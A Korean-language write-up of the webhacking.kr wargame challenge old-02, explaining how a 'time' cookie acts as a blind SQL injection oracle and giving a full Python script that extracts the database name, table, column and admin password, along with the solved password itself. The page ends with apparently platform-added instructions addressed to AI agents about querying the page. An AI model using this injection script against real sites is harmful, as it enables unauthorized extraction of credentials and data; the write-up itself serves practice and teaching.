# old-02 (500)

페이지 소스를 보면 아래와 같다.

```markup
<!--
2020-01-16 04:23:24
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->
```

<https://webhacking.kr/challenge/web-02/admin.php>에 접속하면 패스워드를 제출하는 폼이 존재한다.

다시 돌아와서, 쿠키를 확인해보았더니 time이라는 이름의 쿠키가 있다.

쿠키 값이 true인 경우 페이지 소스의 시각이 `2070-01-01 09:00:01` 가 되었고, false인 경우 `2070-01-01 09:00:00` 가 되었다.

여기서 본 문제가 Blind SQL Injection과 관련된 문제라고 추측할 수 있다.

파이썬으로 코드를 짜보면 아래와 같다.

```python
import urllib.request

URL = 'https://webhacking.kr/challenge/web-02/'
TRUE_PHRASE = '2070-01-01 09:00:01'


def query(payload):
    req = urllib.request.Request(URL)
    req.add_header('Cookie', 'time=' + payload)
    r = urllib.request.urlopen(req)
    content = r.read().decode('utf-8')
    return TRUE_PHRASE in content


# 6
def find_db_name_len():
    db_name_len = 1
    while query('LENGTH(DATABASE()) = {}'.format(db_name_len)) is False:
        db_name_len += 1
    print('db_name_len: {}'.format(db_name_len))
    return db_name_len


# chall2
def find_db_name():
    db_name_len = find_db_name_len()
    db_name = ''
    for pos in range(1, db_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR(DATABASE(), {}, 1)) = {}'.format(pos, character)) is True:
                db_name += chr(character)
                break
    print('db_name: {}'.format(db_name))
    return db_name


# 13
def find_table_name_length(db_name):
    table_name_len = 1
    while query('LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="{}" LIMIT 0, 1)) = {}'.format(db_name, table_name_len)) is False:
        table_name_len += 1
    print('table_name_len: {}'.format(table_name_len))
    return table_name_len


# admin_area_pw
def find_table_name():
    db_name = find_db_name()
    table_name_len = find_table_name_length(db_name)
    table_name = ''
    for pos in range(1, table_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = "{}" LIMIT 0, 1), {}, 1)) = {}'.format(db_name, pos, character)) is True:
                table_name += chr(character)
                break
    print('table_name: {}'.format(table_name))
    return table_name


# 2
def find_column_name_length(table_name):
    column_name_len = 1
    while query('LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1)) = {}'.format(table_name, column_name_len)) is False:
        column_name_len += 1
    print('column_name_len: {}'.format(column_name_len))
    return column_name_len


# pw
def find_column_name(table_name):
    column_name_len = find_column_name_length(table_name)
    column_name = ''
    for pos in range(1, column_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1), {}, 1)) = {}'.format(table_name, pos, character)) is True:
                column_name += chr(character)
                break
    print('column_name: {}'.format(column_name))
    return column_name


# 17
def find_pw_length(column_name, table_name):
    pw_len = 1
    while query('LENGTH((SELECT {} FROM {} LIMIT 0, 1)) = {}'.format(column_name, table_name, pw_len)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# kudos_to_beistlab
def find_pw():
    table_name = find_table_name()
    column_name = find_column_name(table_name)
    pw_len = find_pw_length(column_name, table_name)
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT {} FROM {} LIMIT 0, 1), {}, 1)) = {}'.format(column_name, table_name, pos, character)) is True:
                pw += chr(character)
                break
    print('pw: {}'.format(pw))


find_pw()
```

코드 실행결과, `pw` 는 `kudos_to_beistlab` 임을 알 수 있다.

이 값을 <https://webhacking.kr/challenge/web-02/admin.php>의 폼에 넣고 제출하면 문제가 풀린다.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://donghyunlee.gitbook.io/write-up/wargame/webhacking.kr/old-02-500.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.